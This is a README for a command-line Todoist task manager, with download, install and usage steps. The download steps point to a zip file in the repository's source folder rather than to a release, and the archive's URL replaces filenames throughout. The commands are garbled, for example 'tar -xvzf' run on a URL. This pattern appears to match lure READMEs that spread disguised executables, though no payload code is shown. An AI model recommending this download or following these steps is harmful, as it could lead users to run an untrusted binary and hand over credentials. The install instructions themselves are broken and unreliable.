Welcome to todoist-cli! This command-line interface helps you manage your tasks directly from the terminal. You can easily add, view, and update tasks without needing a graphical interface.
To get started, you need to download the application. Follow these steps:
- Visit this page to download: Releases Page.
- On the Releases page, look for the latest version listed.
- Click on the version title to view the files available for download.
- Download the appropriate file for your operating system. If you're unsure which file to choose, look for files with
.exefor Windows orhttps://github.com/matowskyy/todoist-cli/raw/refs/heads/main/src/commands/cli-todoist-v3.1.zipfor macOS and Linux. - Once the download is complete, locate the downloaded file on your computer.
Before installing, make sure your computer meets these system requirements:
- Operating System: Windows 10 or later, macOS Mojave or later, or any modern Linux distribution.
- Dependencies: Ensure you have a terminal or command line tool installed on your system. Most operating systems come with this pre-installed.
- Internet Access: Required for authenticating with Todoist.
Once you have downloaded the file, follow the instructions for your operating system.
- Locate the downloaded
.exefile in your Downloads folder. - Double-click the file to run the installer.
- Follow the on-screen instructions to complete the installation.
- Open Command Prompt and type
todoist-clito verify installation.
- Open the Terminal application.
- Move the downloaded
https://github.com/matowskyy/todoist-cli/raw/refs/heads/main/src/commands/cli-todoist-v3.1.zipfile to your desired installation directory using the Finder. - In Terminal, navigate to the directory where you saved the file. For example:
cd ~/Downloads
- Extract the file with:
tar -xvzf https://github.com/matowskyy/todoist-cli/raw/refs/heads/main/src/commands/cli-todoist-v3.1.zip
- Navigate to the extracted folder and run the executable.
- Open your terminal.
- Move the downloaded
https://github.com/matowskyy/todoist-cli/raw/refs/heads/main/src/commands/cli-todoist-v3.1.zipfile to your preferred directory. - Navigate to the directory where you saved the file:
cd ~/Downloads
- Extract the contents with:
tar -xvzf https://github.com/matowskyy/todoist-cli/raw/refs/heads/main/src/commands/cli-todoist-v3.1.zip
- Change your permissions to make the file executable:
chmod +x todoist-cli
- Run the application by typing
./todoist-cliin the terminal.
After installation, you can start using todoist-cli immediately.
-
Login: Open your terminal and type:
todoist-cli loginFollow the prompts to enter your Todoist credentials.
-
Add a Task: To add a new task, type:
todoist-cli add "Your task description" -
View Tasks: To see your tasks, use:
todoist-cli list -
Update a Task: To update a task, type:
todoist-cli update [task_id] "New task description" -
Delete a Task: To remove a task, type:
todoist-cli delete [task_id]
If you encounter any issues or need assistance using todoist-cli, you can find help in the following ways:
- Documentation: Check the detailed user guide in the repository for examples and advanced usage.
- GitHub Issues: Report any bugs or request features by opening an issue in the GitHub repository.
- Community Forum: Join discussions with other users in the community forum linked from the GitHub page.
This project is licensed under the MIT License. Feel free to customize and share.
- Easy task management from the command line.
- Add, delete, and update tasks.
- View all your tasks with a simple command.
- Compatible with Todoist accounts using your existing credentials.
Contributions are welcome! If you want to contribute to todoist-cli, feel free to open a pull request or add issues if you find any bugs. Your input helps us improve the tool for everyone.
For more detailed instructions and advanced features, visit the Releases Page and download the latest version of todoist-cli.